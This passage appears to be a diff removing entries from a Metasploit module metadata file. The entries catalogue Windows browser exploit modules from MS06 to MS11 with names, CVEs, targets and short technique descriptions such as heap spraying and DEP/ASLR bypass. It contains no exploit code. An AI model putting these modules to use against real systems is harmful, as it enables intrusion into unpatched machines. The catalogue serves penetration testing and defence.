"URL-https://seclists.org/lists/fulldisclosure/2006/Mar/1439.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)", - "Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/ms06_013_createtextrange.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms06_013_createtextrange", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms06_055_vml_method": { - "name": "MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution", - "fullname": "exploit/windows/browser/ms06_055_vml_method", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-09-19", - "type": "exploit", - "author": [ - "hdm ", - "Aviv Raff ", - "Trirat Puttaraksa (Kira) ", - "Mr.Niega ", - "M. Shirk " - ], - "description": "This module exploits a code execution vulnerability in Microsoft Internet Explorer using\n a buffer overflow in the VML processing code (VGX.dll). This module has been tested on\n Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.", - "references": [ - "CVE-2006-4868", - "OSVDB-28946", - "MSB-MS06-055", - "BID-20096" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows NT 4.0 -> Windows 2003 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms06_055_vml_method.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms06_055_vml_method", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms06_057_webview_setslice": { - "name": "MS06-057 Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow", - "fullname": "exploit/windows/browser/ms06_057_webview_setslice", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-07-17", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a flaw in the WebViewFolderIcon ActiveX control\n included with Windows 2000, Windows XP, and Windows 2003. This flaw was published\n during the Month of Browser Bugs project (MoBB #18).", - "references": [ - "CVE-2006-3730", - "OSVDB-27110", - "MSB-MS06-057", - "BID-19030" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP2 / IE 6.0SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms06_057_webview_setslice.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms06_057_webview_setslice", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms06_067_keyframe": { - "name": "MS06-067 Microsoft Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability", - "fullname": "exploit/windows/browser/ms06_067_keyframe", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-11-14", - "type": "exploit", - "author": [ - "Alexander Sotirov ", - "skape " - ], - "description": "This module exploits a heap overflow vulnerability in the KeyFrame method of the\n direct animation ActiveX control. This is a port of the exploit implemented by\n Alexander Sotirov.", - "references": [ - "CVE-2006-4777", - "OSVDB-28842", - "BID-20047", - "MSB-MS06-067" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000/XP/2003 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms06_067_keyframe.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms06_067_keyframe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms06_071_xml_core": { - "name": "MS06-071 Microsoft Internet Explorer XML Core Services HTTP Request Handling", - "fullname": "exploit/windows/browser/ms06_071_xml_core", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-10-10", - "type": "exploit", - "author": [ - "Trirat Puttaraksa " - ], - "description": "This module exploits a code execution vulnerability in Microsoft XML Core Services which\n exists in the XMLHTTP ActiveX control. This module is the modified version of\n http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully\n tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6\n + Microsoft XML Core Services 4.0 SP2.", - "references": [ - "CVE-2006-5745", - "OSVDB-29425", - "MSB-MS06-071", - "BID-20915" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP4 -> Windows 2003 SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms06_071_xml_core.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms06_071_xml_core", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms07_017_ani_loadimage_chunksize": { - "name": "Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)", - "fullname": "exploit/windows/browser/ms07_017_ani_loadimage_chunksize", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-03-28", - "type": "exploit", - "author": [ - "hdm ", - "skape ", - "Solar Eclipse " - ], - "description": "This module exploits a buffer overflow vulnerability in the\n LoadAniIcon() function in USER32.dll. The flaw can be triggered through\n Internet Explorer 6 and 7 by using the CURSOR style sheet directive\n to load a malicious .ANI file. The module can also exploit Mozilla\n Firefox by using a UNC path in a moz-icon URL and serving the .ANI file\n over WebDAV. The vulnerable code in USER32.dll will catch any\n exceptions that occur while the invalid cursor is loaded, causing the\n exploit to silently fail when the wrong target has been chosen.\n\n This vulnerability was discovered by Alexander Sotirov of Determina\n and was rediscovered, in the wild, by McAfee.", - "references": [ - "CVE-2007-0038", - "OSVDB-33629", - "BID-23194", - "MSB-MS07-017" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "(Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista", - "IE6 on Windows NT, 2000, XP, 2003 (all languages)", - "IE7 on Windows XP SP2, 2003 SP1, SP2 (all languages)", - "IE7 and Firefox on Windows Vista (all languages)", - "Firefox on Windows XP (English)", - "Firefox on Windows 2003 (English)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms07_017_ani_loadimage_chunksize", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms08_041_snapshotviewer": { - "name": "Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download", - "fullname": "exploit/windows/browser/ms08_041_snapshotviewer", - "aliases": [], - "rank": 600, - "disclosure_date": "2008-07-07", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module allows remote attackers to place arbitrary files on a users file system\n via the Microsoft Office Snapshot Viewer ActiveX Control.", - "references": [ - "CVE-2008-2463", - "OSVDB-46749", - "MSB-MS08-041", - "BID-30114" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms08_041_snapshotviewer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms08_053_mediaencoder": { - "name": "Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow", - "fullname": "exploit/windows/browser/ms08_053_mediaencoder", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-09-09", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Windows Media Encoder 9. When\n sending an overly long string to the GetDetailsString() method of wmex.dll\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2008-3008", - "OSVDB-47962", - "BID-31065", - "MSB-MS08-053" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2-SP3 IE 6.0 SP0-SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms08_053_mediaencoder.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms08_053_mediaencoder", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms08_070_visual_studio_msmask": { - "name": "Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow", - "fullname": "exploit/windows/browser/ms08_070_visual_studio_msmask", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-08-13", - "type": "exploit", - "author": [ - "koshi", - "MC " - ], - "description": "This module exploits a stack buffer overflow in Microsoft's Visual Studio 6.0.\n When passing a specially crafted string to the Mask parameter of the\n Mdmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary\n code.", - "references": [ - "CVE-2008-3704", - "OSVDB-47475", - "BID-30674", - "MSB-MS08-070" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP2 IE 6.0 SP0-SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms08_070_visual_studio_msmask", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms08_078_xml_corruption": { - "name": "MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption", - "fullname": "exploit/windows/browser/ms08_078_xml_corruption", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-12-07", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a vulnerability in the data binding feature of Internet\n Explorer. In order to execute code reliably, this module uses the .NET DLL\n memory technique pioneered by Alexander Sotirov and Mark Dowd. This method is\n used to create a fake vtable at a known location with all methods pointing\n to our payload. Since the .text segment of the .NET DLL is non-writable, a\n prefixed code stub is used to copy the payload into a new memory segment and\n continue execution from there.", - "references": [ - "CVE-2008-4844", - "OSVDB-50622", - "BID-32721", - "MSB-MS08-078", - "URL-https://web.archive.org/web/20080913064223/http://taossa.com/archive/bh08sotirovdowd.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms08_078_xml_corruption.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms08_078_xml_corruption", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms09_002_memory_corruption": { - "name": "MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption", - "fullname": "exploit/windows/browser/ms09_002_memory_corruption", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-02-10", - "type": "exploit", - "author": [ - "dean " - ], - "description": "This module exploits an error related to the CFunctionPointer function when attempting\n to access uninitialized memory. A remote attacker could exploit this vulnerability to\n corrupt memory and execute arbitrary code on the system with the privileges of the victim.", - "references": [ - "CVE-2009-0075", - "OSVDB-51839", - "MSB-MS09-002" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2-SP3 / Windows Vista SP0 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms09_002_memory_corruption.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms09_002_memory_corruption", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms09_043_owc_htmlurl": { - "name": "Microsoft OWC Spreadsheet HTMLURL Buffer Overflow", - "fullname": "exploit/windows/browser/ms09_043_owc_htmlurl", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-08-11", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a buffer overflow in Microsoft's Office Web Components.\n When passing an overly long string as the \"HTMLURL\" parameter an attacker can\n execute arbitrary code.", - "references": [ - "CVE-2009-1534", - "OSVDB-56916", - "BID-35992", - "MSB-MS09-043", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=819" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 - IE6 - Office XP SP0", - "Windows XP SP3 - IE6 - Office XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms09_043_owc_htmlurl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms09_043_owc_msdso": { - "name": "Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption", - "fullname": "exploit/windows/browser/ms09_043_owc_msdso", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-07-13", - "type": "exploit", - "author": [ - "unknown", - "hdm ", - "Ahmed Obied", - "DSR! " - ], - "description": "This module exploits a memory corruption vulnerability within versions 10 and 11 of\n the Office Web Component Spreadsheet ActiveX control. This module was based on\n an exploit found in the wild.", - "references": [ - "CVE-2009-1136", - "OSVDB-55806", - "MSB-MS09-043", - "URL-http://ahmed.obied.net/software/code/exploits/ie_owc.py", - "EDB-9163", - "URL-https://web.archive.org/web/20090716143635/http://xeye.us/blog/2009/07/one-0day/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms09_043_owc_msdso.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms09_043_owc_msdso", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms09_072_style_object": { - "name": "MS09-072 Microsoft Internet Explorer Style getElementsByTagName Memory Corruption", - "fullname": "exploit/windows/browser/ms09_072_style_object", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-11-20", - "type": "exploit", - "author": [ - "securitylab.ir ", - "jduck " - ], - "description": "This module exploits a vulnerability in the getElementsByTagName function\n as implemented within Internet Explorer.", - "references": [ - "MSB-MS09-072", - "CVE-2009-3672", - "OSVDB-50622", - "BID-37085", - "URL-https://web.archive.org/web/20090316061713/http://taossa.com/archive/bh08sotirovdowd.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms09_072_style_object.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms09_072_style_object", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms10_002_aurora": { - "name": "MS10-002 Microsoft Internet Explorer \"Aurora\" Memory Corruption", - "fullname": "exploit/windows/browser/ms10_002_aurora", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-01-14", - "type": "exploit", - "author": [ - "unknown", - "hdm " - ], - "description": "This module exploits a memory corruption flaw in Internet Explorer. This\n flaw was found in the wild and was a key component of the \"Operation Aurora\"\n attacks that lead to the compromise of a number of high profile companies. The\n exploit code is a direct port of the public sample published to the Wepawet\n malware analysis site. The technique used by this module is currently identical\n to the public sample, as such, only Internet Explorer 6 can be reliably exploited.", - "references": [ - "MSB-MS10-002", - "CVE-2010-0249", - "OSVDB-61697", - "URL-https://web.archive.org/web/20100609073233/http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms10_002_aurora.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms10_002_aurora", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms10_002_ie_object": { - "name": "MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free", - "fullname": "exploit/windows/browser/ms10_002_ie_object", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-01-21", - "type": "exploit", - "author": [ - "Peter Vreugdenhil", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Internet Explorer's\n mshtml component. Due to the way IE handles objects in memory, it is\n possible to cause a pointer in CTableRowCellsCollectionCacheItem::GetNext\n to be used even after it gets freed, therefore allowing remote code\n execution under the context of the user.\n\n This particular vulnerability was also one of 2012's Pwn2Own\n challenges, and was later explained by Peter Vreugdenhil with exploitation\n details. Instead of Peter's method, this module uses heap spraying like\n the 99% to store a specially crafted memory layout before re-using the\n freed memory.", - "references": [ - "MSB-MS10-002", - "CVE-2010-0248", - "OSVDB-61914", - "URL-http://dvlabs.tippingpoint.com/blog/2012/03/15/pwn2own-2012-challenge-writeup", - "ZDI-10-014" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 8 on Windows XP SP3", - "IE 8 on Windows 7 SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms10_002_ie_object.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms10_002_ie_object", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms10_018_ie_behaviors": { - "name": "MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free", - "fullname": "exploit/windows/browser/ms10_018_ie_behaviors", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-03-09", - "type": "exploit", - "author": [ - "unknown", - "Trancer ", - "Nanika", - "jduck " - ], - "description": "This module exploits a use-after-free vulnerability within the DHTML behaviors\n functionality of Microsoft Internet Explorer versions 6 and 7. This bug was\n discovered being used in-the-wild and was previously known as the \"iepeers\"\n vulnerability. The name comes from Microsoft's suggested workaround to block\n access to the iepeers.dll file.\n\n According to Nico Waisman, \"The bug itself is when trying to persist an object\n using the setAttribute, which end up calling VariantChangeTypeEx with both the\n source and the destination being the same variant. So if you send as a variant\n an IDISPATCH the algorithm will try to do a VariantClear of the destination before\n using it. This will end up on a call to PlainRelease which deref the reference\n and clean the object.\"\n\n NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.", - "references": [ - "CVE-2010-0806", - "OSVDB-62810", - "BID-38615", - "URL-https://web.archive.org/web/20100929225343/http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/", - "URL-https://web.archive.org/web/20120627174253/http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html", - "MSB-MS10-018" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista", - "IE 6 SP0-SP2 (onclick)", - "IE 7.0 (marquee)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms10_018_ie_behaviors", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms10_018_ie_tabular_activex": { - "name": "MS10-018 Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption", - "fullname": "exploit/windows/browser/ms10_018_ie_tabular_activex", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-03-09", - "type": "exploit", - "author": [ - "Unknown", - "jduck " - ], - "description": "This module exploits a memory corruption vulnerability in the Internet Explorer\n Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet\n Explorer are vulnerable.\n\n By specifying a long value as the \"DataURL\" parameter to this control, it is possible\n to write a NUL byte outside the bounds of an array. By targeting control flow data\n on the stack, an attacker can execute arbitrary code.", - "references": [ - "CVE-2010-0805", - "OSVDB-63329", - "BID-39025", - "ZDI-10-034", - "MSB-MS10-018" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic (Heap Spray)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms10_018_ie_tabular_activex", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms10_022_ie_vbscript_winhlp32": { - "name": "MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution", - "fullname": "exploit/windows/browser/ms10_022_ie_vbscript_winhlp32", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-02-26", - "type": "exploit", - "author": [ - "Maurycy Prodeus", - "jduck " - ], - "description": "This module exploits a code execution vulnerability that occurs when a user\n presses F1 on MessageBox originated from VBscript within a web page. When the\n user hits F1, the MessageBox help functionality will attempt to load and use\n a HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server.\n\n This particular version of the exploit implements a WebDAV server that will\n serve HLP file as well as a payload EXE. During testing warnings about the\n payload EXE being unsigned were witnessed. A future version of this module\n might use other methods that do not create such a warning.", - "references": [ - "CVE-2010-0483", - "OSVDB-62632", - "MSB-MS10-022", - "URL-https://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx", - "URL-https://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Internet Explorer on Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms10_022_ie_vbscript_winhlp32", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms10_026_avi_nsamplespersec": { - "name": "MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow", - "fullname": "exploit/windows/browser/ms10_026_avi_nsamplespersec", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-04-13", - "type": "exploit", - "author": [ - "Yamata Li", - "Shahin Ramezany ", - "juan vazquez ", - "Jordi Sanchez " - ], - "description": "This module exploits a buffer overflow in l3codecx.ax while processing a\n AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite\n with 0's so the three least significant bytes of EIP saved on stack are\n overwritten and shellcode is mapped using the .NET DLL memory technique pioneered\n by Alexander Sotirov and Mark Dowd.\n\n Please note on IE 8 targets, your malicious URL must be a trusted site in order\n to load the .Net control.", - "references": [ - "CVE-2010-0480", - "OSVDB-63749", - "BID-39303", - "MSB-MS10-026", - "URL-http://web.archive.org/web/20110916145030/http://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/", - "URL-http://www.phreedom.org/research/bypassing-browser-memory-protections/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 Automatic" - ], - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms10_026_avi_nsamplespersec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms10_042_helpctr_xss_cmd_exec": { - "name": "Microsoft Help Center XSS and Command Execution", - "fullname": "exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-06-09", - "type": "exploit", - "author": [ - "Tavis Ormandy", - "natron " - ], - "description": "Help and Support Center is the default application provided to access online\n documentation for Microsoft Windows. Microsoft supports accessing help documents\n directly via URLs by installing a protocol handler for the scheme \"hcp\". Due to\n an error in validation of input to hcp:// combined with a local cross site\n scripting vulnerability and a specialized mechanism to launch the XSS trigger,\n arbitrary command execution can be achieved.\n\n On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it\n can be used to launch the exploit automatically. If IE8 and WMP11, either can\n be used to launch the attack, but both pop dialog boxes asking the user if\n execution should continue. This exploit detects if non-intrusive mechanisms are\n available and will use one if possible. In the case of both IE8 and WMP11, the\n exploit defaults to using an iframe on IE8, but is configurable by setting the\n DIALOGMECH option to \"none\" or \"player\".\n\n This module creates a WebDAV service from which the payload is copied to the\n victim machine.", - "references": [ - "CVE-2010-1885", - "OSVDB-65264", - "MSB-MS10-042" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-05-30 10:56:41 +0000", - "path": "/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms10_042_helpctr_xss_cmd_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms10_046_shortcut_icon_dllloader": { - "name": "Microsoft Windows Shell LNK Code Execution", - "fullname": "exploit/windows/browser/ms10_046_shortcut_icon_dllloader", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-07-16", - "type": "exploit", - "author": [ - "hdm ", - "jduck ", - "B_H" - ], - "description": "This module exploits a vulnerability in the handling of Windows\n Shortcut files (.LNK) that contain an icon resource pointing to a\n malicious DLL. This module creates a WebDAV service that can be used\n to run an arbitrary payload when accessed as a UNC path.", - "references": [ - "CVE-2010-2568", - "OSVDB-66387", - "MSB-MS10-046" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms10_046_shortcut_icon_dllloader", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms10_090_ie_css_clip": { - "name": "MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption", - "fullname": "exploit/windows/browser/ms10_090_ie_css_clip", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-11-03", - "type": "exploit", - "author": [ - "unknown", - "Yuange", - "Matteo Memelli", - "jduck " - ], - "description": "This module exploits a memory corruption vulnerability within Microsoft's\n HTML engine (mshtml). When parsing an HTML page containing a specially\n crafted CSS tag, memory corruption occurs that can lead arbitrary code\n execution.\n\n It seems like Microsoft code inadvertently increments a vtable pointer to\n point to an unaligned address within the vtable's function pointers. This\n leads to the program counter being set to the address determined by the\n address \"[vtable+0x30+1]\". The particular address depends on the exact\n version of the mshtml library in use.\n\n Since the address depends on the version of mshtml, some versions may not\n be exploitable. Specifically, those ending up with a program counter value\n within another module, in kernel space, or just not able to be reached with\n various memory spraying techniques.\n\n Also, since the address is not controllable, it is unlikely to be possible\n to use ROP to bypass non-executable memory protections.", - "references": [ - "CVE-2010-3962", - "OSVDB-68987", - "BID-44536", - "EDB-15421", - "MSB-MS10-090" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Debug", - "Internet Explorer 6", - "Internet Explorer 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms10_090_ie_css_clip", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms11_003_ie_css_import": { - "name": "MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free", - "fullname": "exploit/windows/browser/ms11_003_ie_css_import", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-11-29", - "type": "exploit", - "author": [ - "passerby", - "d0c_s4vage", - "jduck " - ], - "description": "This module exploits a memory corruption vulnerability within Microsoft\\'s\n HTML engine (mshtml). When parsing an HTML page containing a recursive CSS\n import, a C++ object is deleted and later reused. This leads to arbitrary\n code execution.\n\n This exploit utilizes a combination of heap spraying and the\n .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not\n opt-in to ASLR. As such, this module should be reliable on all Windows\n versions with .NET 2.0.50727 installed.", - "references": [ - "CVE-2010-3971", - "OSVDB-69796", - "BID-45246", - "URL-http://www.wooyun.org/bugs/wooyun-2010-0885", - 